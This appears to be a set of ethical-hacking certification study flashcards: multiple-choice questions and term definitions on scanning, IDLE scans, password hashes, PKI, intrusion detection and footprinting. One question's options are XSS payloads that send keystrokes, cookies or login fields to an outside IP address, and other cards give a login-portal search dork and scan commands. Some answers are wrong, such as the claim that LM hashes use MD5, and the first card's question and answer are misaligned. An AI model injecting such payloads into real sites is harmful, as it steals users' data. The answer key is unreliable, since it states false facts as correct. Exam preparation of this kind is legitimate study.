You have a large packet capture file in Wireshark to review. You want to filter traffic to show all packets with an IP address of 192.168.22.5 that contain the string HR_admin. Which of the following filters would accomplish this task? A. ip.addr==192.168.22.5 && tcp contains HR_admin B. ip.addr 192.168.22.5 && "HR_admin" C. ip.addr 192.168.22.5 && tcp string == HR_admin D. ip.addr==192.168.22.5 + tcp contains tide
A. Your IDLE scan results will not be useful to you.
You have a zombie system ready and begin an IDLE scan. As the scan moves along, you notice that fragment identification numbers gleaned from the zombie machine are incrementing randomly. What does this mean? A. Your IDLE scan results will not be useful to you. B. The zombie system is a honeypot. C. There is a misbehaving firewall between you and the zombie machine. D. This is an expected result during an IDLE scan.
E)Acquisition
You have been asked to perform a thorough vulnerability assessment for your company's file server. You must ensure that you complete all of the appropriate steps for the assessment. What is the first step or phase? A)Evaluation B)Identification C)Analyzing D)Generating reports E)Acquisition
C)ISO/IEC 27001:2013
You have been hired as a consultant for a company. You have been asked to provide guidance on establishing, implementing, maintaining, and improving their information security management system. They ask that you provide recommendations based on industry standards. Which of the following standard should you use? A)SOX B)PCI-DSS C)ISO/IEC 27001:2013 D)DMCA
A)Medical
You have been hired as an ethical hacker by a company. During your initial meeting, you are given several guidelines that must be complied with by the company's security, including HIPAA. Which type of company has MOST likely hired you? A)Medical B)Government C)Financial D)Publicly traded
C)Star
You have been hired as an ethical hacker by a small company. The company's network uses UTP cable that connects 45 devices to a central switch. Which type of network topology is implemented? A)Bus B)Ring C)Star D)Mesh
D)Collecting system information
You have been hired as an ethical hacker by your company. You are currently involved in footprinting from outside your company's network. During the most recent analysis, you obtain SNMP information, user, computer and group names and user passwords. Which footprinting objective are you completing? A)Collecting network information B)Collecting organizational information C)Collecting security information D)Collecting system information
A)End-user security training
You have conducted a technical assessment of the network by attempting a number of different social engineering attacks on the network. Which of the following processes is MOST LIKELY to be altered as a result? A)End-user security training B)Physical security C)Password policies D)Access control management
A)Man-in-the-middle attacks
You have decided to implement both client and server PKI certificates to be used by all systems when authenticating to the corporate web site. What type of attack can this help prevent? A)Man-in-the-middle attacks B)Rogue access points C)Smurf attacks D)SYN floods
B)The attacker captured information from a legitimate session and used the session ID from the legitimate session to connect to a computer on your network.
You have recently discovered that an attacker has successfully carried out a session sniffing attack. Which description best describes this attack? A)The attacker masqueraded as a trusted host by using an IP address from within the network being attacked. B)The attacker captured information from a legitimate session and used the session ID from the legitimate session to connect to a computer on your network. C)The attacker inserted malicious coding into a link that appeared to be from a trustworthy source. D)The attacker added SQL code to a Web form input box to gain access to resources or make changes to data.
D)Firewall evasion
You have recently discovered that an attacker used the tcp-over-dns tool on your company's network. What is this tool meant to accomplish in an attack? A)Packet sniffing B)Port scanning C)Vulnerability scanning D)Firewall evasion
A) MD5
You have successfully captured an LM Manager SAM file from an older Windows machine. Which encryption algorithm is used by LM Manager on Windows 2000 SAM file entries? A) MD5 B) MD4 C) SSL D) DES
B) If the right side of the hash ends with 1404EE, the password is less than eight characters
You have successfully copied the LM hash values of passwords on the machine. Which of the following is true statement? A) If the left side of the hash begins with the 1404EE, the password is less than either characters B) If the right side of the hash ends with 1404EE, the password is less than eight characters C) There is no way to tell whether passwords are less than eight characters, you can't reverse hashes D) There is no way to tell whether passwords are less than eight characters; each hash is always 32 long
B. ARP poisoning to allow you to see messages from Host A to Host B
You have successfully tapped into a network subnet of your target organization. You begin an attack by learning all significant MAC addresses on the subnet. After some time, you decide to intercept messages between two hosts. You begin by sending broadcast messages to Host A showing your MAC address as belonging to Host B. Simultaneously, you send messages to Host B showing your MAC address as belonging to Host A. What is being accomplished here? A. ARP poisoning to allow you to see all messages from either host without interrupting their communications process B. ARP poisoning to allow you to see messages from Host A to Host B C. ARP poisoning to allow you to see messages from Host B to Host A D. ARP poisoning to allow you to see messages from Host A destined to any address E. ARP poisoning to allow you to see messages from Host B destined to any address.
B)File and folder encryption
You manage a network that contains Windows Server 2008 and Windows Vista computers. You have several laptops that are issued to employees when they are working remotely. You decide to implement EFS on the laptop computers. What does this provide? A)Automatic error recovery B)File and folder encryption C)Drive encryption D)File-level security
B)Polymorphic virus
Your company has deployed a signature-based anti-virus application on all of its computers. You are concerned that there will be new viruses created that the application cannot detect. Which of the following virus types is most likely to evade detection by the anti-virus application? A)Stealth virus B)Polymorphic virus C)Fast-infecting virus D)Tunneling virus
D)The TTL value is 1, and the destination host is several hops away.
You routinely test network connectivity using the ping command. Recently, you noticed that a router discarded an ICMP packet and sent a time exceeded message to the source host. Which of the following conditions would cause this to occur? A)The TTL value is 2, and the source host is one hop away. B)The TTL value is 2, and the destination host is one hop away. C)The TTL value is 1, and the source host is several hops away. D)The TTL value is 1, and the destination host is several hops away.
B)Enumeration the alive systems in first ten IP addresses in the 192.168.1.0 network via ICMP
You run the following command on a Windows computer: FOR /L %H IN (1 1 10) DO ping -n 1 192.168.1.%H | FIND /I "reply" What is the result? A)Enumeration of the alive systems in the last ten IP addresses in the 192.168.1.0 network via ICMP B)Enumeration the alive systems in first ten IP addresses in the 192.168.1.0 network via ICMP C)Enumeration all the dead systems in the 192.168.1.0 network via ICMP D)Enumeration of all the alive systems in the 192.168.1.0 network via ICMP
B) TCPflow
You want to extract the Application Layer data from TCP connections in a log file into separate files. Of the following, which is the best tool to accomplish this task? A) TCPdump B) TCPflow C) Snort D) NMAP
B) TCPflow
You want to extract the Application layer data from TCP connections in a log file into separate files. Of the following, which is the best tool to accomplish this task? A) TCPdump B) TCPflow C) Snort D) Nmap
C. nmap -sP 192.168.1.0/24
You want to perform a ping sweep of a subnet within your target organization. Which of the following nmap command lines is your best option? A. nmap 192.168.1.0/24 B. nmap -sT 192.168.1.0/24 C. nmap -sP 192.168.1.0/24 D. nmap -P0 192.168.1.0/24
A. Telnet 168.15.22.4 80 C. nc -v -n 168.15.22.4 80
You want to perform banner grabbing against a machine (168.15.22.4) you suspect as being a web server. Assuming you have the correct tools installed, which of the following command-line entries will successfully perform a banner grab? (Choose all that apply.) A. Telnet 168.15.22.4 80 B. Telnet 80 168.15.22.4 C. nc -v -n 168.15.22.4 80 D. nc -v -n 80 168.15.22.4
C. nmap -sS targetIPaddress
You want to run a scan against a target network. You're concerned about it being a reliable scan, with legitimate results, but want to take steps to ensure it is as stealthy as possible. Which scan type is best in this situation? A. nmap -sN targetIPaddress B. nmap -sO targetIPaddress C. nmap -sS targetIPaddress D. nmap -sT targetIPaddress
C)PPTP
You would like to encrypt a VPN connection at the Data Link layer of the OSI model. Which protocol should you choose? A)GRE B)IPSec C)PPTP D)L2TP
B. Closed
You're running an IDLE scan and send the first packet to the target machine. Next, the SYN/ACK packet is sent to the zombie. The IPID on the return packet from the zombie is 36754. If the starting was 36753, in what state is the port on the target machine? A. Open B. Closed C. Unknown D. None of the above.
E. Anomaly based
Your IDS sits on the network perimeter and has been analyzing traffic for a couple of weeks. On arrival one morning, you find the IDS has alerted on a spike in network traffic late the previous evening. Which type of IDS are you using? A. Stateful B. Snort C. Passive D. Signature based E. Anomaly based
D)Limit interactive logon privileges
Your IT security team defends against privilege escalation with the following countermeasures: -Encryption for sensitive company data -Services run as unprivileged accounts -Multi-factor authentication and authorization Which additional countermeasure would BEST enhance the current defense? A)Patch critical systems regularly B)Implement privilege separation for custom programs C)Perform debugging during stress tests D)Limit interactive logon privileges
D) Cygwin
Your client has some Unix tools he wants to run on a Windows machine. A friend suggests a well known Unix subsystem that can run on Windows for just such a purpose. What is this subsystem called? A) Armitage B) Metasploit C) LILO D) Cygwin
A. Information Security Policy
Your company has a document that spells out exactly what employees are allowed to do on their computer systems. It also defines what is prohibited and what consequences await those who break the rules. A copy of this document is signed by all employees prior to their network access. Which of the following best describes this policy? A. Information Security Policy B. Special Access Policy C. Information Audit Policy D. Network Connection Policy
C)Nessus
Your company has a monthly requirement to test corporate compliance with host application usage and security policies. You need to use the appropriate tool to fulfill this requirement. Which tool should you use? A)Wireshark B)Nmap C)Nessus D)Snort
A)ADS Spy B)streams.exe E)SFind
Your company has a policy that alternate data streams (ADSs) should be monitored to verify that they do not contain malicious content. Which of the following tools will help you locate ADSs? (Choose all that apply.) A)ADS Spy B)streams.exe C)AdsCheck.exe D)ADMutate E)SFind
B)RA
Your company has a public key infrastructure (PKI) implemented to issue digital certificates to users. Users start reporting problems with receiving new certificates. You suspect that the entity responsible for receiving the subject's request and verifying the subject's identity is down. Which entity should you check? A)VA B)RA C)OCSP D)CA
C)Detect and analyze
Your company has completed all the appropriate steps to prepare for a potential incident. The next day, a user informs you that the internal Web server is unavailable. When you research the issue, you determine that a Distributed Denial of Service (DDoS) attack has been carried out against the internal Web server. You need to follow the appropriate incident response procedures to recover the internal Web server. What is the first step to perform when an incident has occurred? A)Classify and prioritize B)Notify C)Detect and analyze D)Contain
C)White hat
Your company has decided to hire an ethical hacker to help identify issues with your company's network. Which of the following terms can also be used to describe this position? A)Gray hat B)Black hat C)White hat D)Script kiddie
Windows Task Scheduler
___ along with utilities such as 'at' and 'schtasks' can be used to schedule programs that can be executed at a specific date and time
B)External, host-based vulnerability scan
Your company has hired a third party to identify vulnerabilities on the network. Recently, one of the contractors performed a vulnerability scan over the Internet that identified the vulnerabilities on the internal Web server. Which type of vulnerability scan occurred? A)Internal, host-based vulnerability scan B)External, host-based vulnerability scan C)External, application vulnerability scan D)Internal, application vulnerability scan
B)Snort
Your company has hired an ethical hacker to assess your company's network security. He will need to perform packet sniffing and logging, in addition to detecting any network intrusions. Which tool will he most likely use? A)TCPDump B)Snort C)AirSnort D)Wireshark
A)ESXi C)Hyper-V
Your company has implemented a virtualization solution to isolate software environments and establish access levels for internal employees. Which of the following software are vulnerable to a VM-level attack? (Choose all that apply.) A)ESXi B)Cygwin C)Hyper-V D)XCode E)Wine
D)It will track changes to the files on the server.
Your company has just installed a new Linux file server. You decide in install Tripwire to provide system integrity verification on the file server. Which function will this provide? A)It will provide security checks, including file permissions. B)It will test the system for vulnerabilities. C)It will recover encryption keys. D)It will track changes to the files on the server.
A)HR department
Your company has recently adopted several new security policies. Most of the policies just affect the employees in the IT department. However, one of the policies affects employees in the accounting department. Which entity is responsible for making the employees aware of the new security policies? A)HR department B)IT department C)Departmental managers D)Chief security officer
D)AirSnort
Your company has recently launched several wireless networks at its primary location. Contrary to your suggestions, all the wireless networks use WEP encryption keys. You are concerned that hackers will easily obtain the WEP encryption key. Which tool should you use to demonstrate this vulnerability? A)Netstumbler B)Wireshark C)Nessus D)AirSnort
B)802.1x EAP packets are captured for later replay.
Your company has several wireless networks implemented on its large campus. 802.1x authentication is deployed for all wireless network through a RADIUS server. Recently, you discovered that one of the wireless networks was the victim of an Extensible AP Replay attack. What occurs during this attack? A)A valid 802.1x EAP exchange is observed so that the attacker can later send a forged EAP-Failure message. B)802.1x EAP packets are captured for later replay. C)User credentials are recovered from captured 802.1x LEAP packets using a dictionary attack tool. D)User identities are captured from cleartext 802.1x Identity Response packets.
Signature-based NIDS
Your company implements two Network Intrusion Detection Systems (NIDS): one anomaly-based and one signature-based. It also implements two Network Intrusion Protection Systems (NIPS): one anomaly-based and one stateful protocol-based. Your company employs an ethical hacker who uses ADMutate to disguise a buffer overflow attack. The attack is attempting to breach the network. Which system is most likely being targeted? A)Signature-based NIDS B)Stateful protocol-based NIPS C)Anomaly-based NIPS D)Anomaly-based NIDS
B)Stateful inspection firewall
Your company needs to implement a firewall. It must be able to discard TCP segments arriving at an open port when they have the header flag of FIN enabled, provided they are the first packet received from the source. Which type of firewall should be implemented? A)Packet filter firewall B)Stateful inspection firewall C)Circuit level firewall D)Web application firewall
C)document.onkeypress = function(e) { new Image().src = 'http://5.45.64.15/index.php?data=' + encodeURIComponent(e.key); };
Your company provides a user feedback form that includes a comment field. Currently, comment data is received using a <textarea> element without any front-end or back-end validation. Which of the following JavaScript code would be an example of an attempted XSS KeyLogger attack? A)window.setInterval(function() { new Image().src = 'http://5.45.64.15/index.php?' + Math.floor(Math.random() * 1000) + '=data'; }, 10); B)window.onload = function() { window.location = 'http://5.45.64.15/index.php?data=' + document.cookie; }; C)document.onkeypress = function(e) { new Image().src = 'http://5.45.64.15/index.php?data=' + encodeURIComponent(e.key); }; D)document.forms[0].onsubmit = function() { Window.location = 'http://5.45.64.15/index.php?data=' document.forms[0].username.value + '/' + document.forms[0].password.value; };
B)Password, smart card, retina scan
Your company wants to implement a three-factor access control system. Which of the following would qualify for this implementation? A)PIN, smart card, hardware token B)Password, smart card, retina scan C)PIN, password, smart card D)Fingerprint scan, smart card, retina scan
C)3DES
Your company wants to use symmetric key cryptography in an application it is developing. Which of the following algorithms could be used? A)Diffie-Hellman B)ElGamal C)3DES D)RSA
D)Hiding file data in existing files
Your company's network consists of primarily Windows client and server computers. Recently, management has become concerned with alternate data streams when using NTFS in Windows. What are alternate data streams in Windows? A)Data concealed within another file, message, image, or video B)Automatic file-level encryption C)Optional hard disk-level encryption D)Hiding file data in existing files
C)Go to archive.org
Your company's web site is updated on a regular basis. Over the past three years, the web site has undergone four major updates in response to security issues. One of those major updates was to address a JavaScript vulnerability that allowed SQL injection attacks to occur. A new developer has requested to go back and see the code for the JavaScript vulnerability. However, he discovers that there is retention of the code for the previous web site versions. How can the developer go back and review the code? A)Review the logs for the web server B)Go to whois.org C)Go to archive.org D)It is not possible to retrieve the old code
Authentication Authorization Accounting (AAA)
___ confirms the identity of the user or device. ___ determines the privileges (rights) of the user or device. ___ records the access attempts, both successful and unsuccessful.
Plist files
___ in MacOS and OS X describe when programs should execute, executable file path, program parameters, required OS permissions, etc.
A)Rolling, displays repeatedly until the script process is killed
Your manager is testing your understanding of the PHP language. She provides you the following code: <?php for (;;) { print "Rolling,"; } ?> She asks you to describe the output. Which description is correct? A)Rolling, displays repeatedly until the script process is killed B)Rolling, displays once C)"Rolling,"; displays repeatedly until the script host automatically reboots D)"Rolling,"; "Rolling,"; displays every 30 seconds E)"Rolling,"; displays once F)Error message displays G)Rolling,Rolling, displays every 30 milliseconds
D. 0.20
Your network contains certain servers that typically fail once every five years. The total cost of one of these servers is $1000. Server technicians are paid $40 per hour, and a typical replacement requires two hours. Ten employees, earning an average of $20 per hour, rely on these servers, and even one of them going down puts the whole group in a wait state until it's brought back up. Which of the following represents the ARO for a server? A. $296 B. $1480 C. $1000 D. 0.20
C)Snort
Your network has increasingly come under attack. Management has asked you to take measures to detect and prevent future attacks. You need to purchase a tool or device that provides intrusion detection, packet sniffing, and logging. Which tool should you recommend? A)Nmap B)Nessus C)Snort D)Foundstone
C)Denial of service
Your network just suffered an attack. Nothing was stolen or deleted, but a key file server was unresponsive to users for about 8 hours. What kind of attack did you suffer? A)Social engineering B)IP spoofing C)Denial of service D)Brute force
B)It will allow the scan to evade your border sensor
Your organization has contracted with a third party to perform a penetration test. You have been allowed to observe and ask questions as the test proceeds. At one point you see that the tester is performing a scan of the network from the Internet and tunneling the scan through SSH. What is the purpose of this extra step? A)The scan will complete faster B)It will allow the scan to evade your border sensor C)The scan will gather more complete information D)It will scan devices that allow SSH connections
C)Non-repudiation
Your organization has decided to implement IPSec. One of the important functions you want to implement is its ability to prove where a message originates. Which feature of IPsec provides this function? A)Authentication B)Confidentiality C)Non-repudiation D)Integrity
A)Mandatory access control
Your organization has implemented a two-factor authentication system that includes usernames, passwords, and smart cards. Users are assigned classifications, and access to resources is granted based on the resource's security label. Which access control mechanism does this implement? A)Mandatory access control B)Detective access control C)Role-based access control D)Physical access control
D)A sniffer used to capture password hashes
Your organization implements a network protocol that uses SMB signing. Which attack does this protect against? A)A port scanner used to discover open ports B)A network mapper used to discover which OSs are used on the network C)A vulnerability scanner used to discover network vulnerabilities D)A sniffer used to capture password hashes
D)Vulnerability protection system
Your organization is concerned that patches and updates aren't being deployed in a timely manner. You need to deploy a system that will help with this problem. Which type of system should you deploy? A)Intrusion prevention system B)Network access control C)Network address translation D)Vulnerability protection system
B. BIA (Business Impact Analysis)
Your organization is planning for the future and is identifying the systems and processes critical for their continued operation. Which of the following best describes this effort? A. BCP B. BIA C. DRP D. ALE
A)Immediately
Your organization processes credit card payments and adheres to the requirements of the Payment Card Industry Data Security Standard. Recently, you upgraded the card processing software to a new version. When are you required by the PCI-DSS to perform external and internal penetration testing? A)Immediately B)Within the next year C)At the next yearly test D)Within the next 6 months
B)Privilege escalation
Your security team has implemented the following controls: Sensitive data is encrypted Interactive logon privileges are restricted Services run as unprivileged accounts Users and applications operate with the least privileges Which of the following vulnerabilities are these controls designed to mitigate? A)DoS attacks B)Privilege escalation C)Phishing attacks D)Trojan software
A)Digital signature B)Private key
Your software company has recently implemented an IaaS solution with a cloud service provider. Multiple web sites use PKI to provide user account security to your customers. Which component(s) are the responsibility of your company to manage? (Choose all that apply.) A)Digital signature B)Private key C)Public key D)Digital certificate E)Secure web gateway
D. TCP over DNS
Your target subnet is protected by a firewalled DMZ. Reconnaissance shows the external firewall passes some traffic from external to internal, but blocks most communications. HTTP traffic to a web server in the DMZ, which answers to www.somebiz.com, is allowed, along with standard traffic such as DNS queries. Which of the following may provide a method to evade the firewall's protection? A. An ACK scan B. Firewalking C. False positive flooding D. TCP over DNS
D) Fragroute
Your target uses a signature based IDS. Which of the following allows an attacker to intentionally craft packets that will eventually by correctly assembled by the target, thereby passing through the IDS undetected? A) Defrag B) Tcpfrag C) Netcat D) Fragroute
C. Extract metadata info from Microsoft Word documents found in mattsBTshop.com, outputting results in an HTML file.
Your team is hired to test a business named Matt's Bait 'n Tackle Shop (domain name mattsBTshop.com). A team member runs the following command: metagoofil -d mattsBTshop.com -t doc,docx -l 50 -n 20 -f results.html Which of the following best describes what the team member is attempting to do? A. Extract metadata info from web pages in mattsBTshop.com, outputting results in Microsoft Word format. B. Extract metadata info from the results.html page in mattsBTshop.com, outputting results in Microsoft Word format. C. Extract metadata info from Microsoft Word documents found in mattsBTshop.com, outputting results in an HTML file. D. Uploading results.html as a macro attachment to any Microsoft Word documents found in mattsBTshop.com.
WebSite-Watcher
allows you to automatically check web pages for updates and changes
eMailTrackerPro
analyzes email headers and reveals information such as sender's geographical location, IP address, etc.
The Onion Routing (Tor)
basically works by installing a small client on the machine, which then gets a list of other clients running (this program) from a directory server. The client then bounces Internet requests across random clients to the destination.
PsPasswd
changes account passwords
Social engineers
depend on the fact that people are unaware of their valuable information and are careless about protecting it
1. Know the security posture (footprinting helps make this clear). 2. Reduce the focus area (network range, number of targers, and so on). 3. Identify vulnerabilities 4. Draw a network map.
describe four main focuses and benefits of footprinting
TCP Connect Scan
detects when a port is open by completing the three-way handshake
PsGetSid
displays the SID of a computer or a user
PsLogList
dump event log records
active footprinting
effort is one that requires the attacker to touch the device, network, or resource
state-sponsored hacker
employed by a government
Colasoft Packet Builder
enables creating custom network packets to audit networks for various attacks
SolarWinds Engineer Toolset's Ping Sweep
enables scanning a range of IP addresses to identify which IP addresses are in use and which ones are currently free. It also performs reverse DNS lookup
PsExec
execute processes remotely
security identifier (SID)
identifies user, group, and computer accounts and follows a specific format.
Vulnerability Scanning
identifies vulnerabilities and weaknesses of a system and network in order to determine how a system can be exploited
VoIP login portals
inurl:8080 intitle:"login" intext:"UserLogin" "English"
Passive Reconnaissance
involves acquiring information without directly interacting with the target.
Passive reconnaissance
involves gathering information about your target without their knowledge.
Active reconnaissance
involves interacting with the target directly by any means
Stealth scan
involves resetting the TCP connection between client and server abruptly before completion of three-way handshake signals making the connection half open
Ping scan
involves sending ICMP ECHO requests to a host. If the host is live, it will return an ICMP ECHO reply
Recon-ng
is a Web Reconnaissance framework with independent modules, database interaction, built in convenience functions, interactive help, and command completion, that provides an environment in which open source web-based reconnaissance can be conducted
Enterprise Information Security Architecture (EISA)
is a collection of requirements and processes that help determine how an organization's information systems are built and how they work.
DNS records
provide important information about location and type of servers
Baselines
provide the minimum security level necessary.
DNS (Domain Naming System)
provides a name-to-IP-address (and vice versa) mapping service, allowing us to type in a name for a resource as opposed to its address.
SNMPv3
provides encryption for the strings as well as other improvements and options.
The Application layer
provides services to applications, which allow them access to the network. Protocols such as FTP and SMTP reside here.
IP spoofing
refers to changing source IP addresses so that the attack appears to be come from someone else
Google hacking
refers to creating complex search queries in order to extract sensitive or hidden information
Hacking
refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to the system resources
passive footprinting
refers to measures to collect information from publicly accessible sources
Spam/Email Steganography
refers to the technique of sending secret messages by hiding them in spam/email messages
information warfare (InfoWar)
refers to the use of information and communication technologies (ICT) to take competitive advantages over an opponent
ARP (Address Resolution Protocol)
resolve IP address to machine (MAC) addresses.
802.11b
runs at up to 11 Mbps at 2.4 GHz
802.11g
runs at up to 54 Mbps at 2.4 GHz
Censys
search engine enables researchers to ask questions about the hosts and networks that compose the Internet
SHODAN
search engine lets you find connected devices (routers, servers, IoT, etc.) using a variety of filters
Scanning and enumeration
security professionals take the information they gathered in recon and actively apply tools and techniques to gather more in-depth information on the targets.
finance.google.com
shows you company news releases on a timeline of its stock performance--in effect, showing you when key milestones occurred can be found where?
Masking and Filtering
techniques hide data using a method similar to watermarks on actual paper and it can be done by modifying the luminance of parts of the image
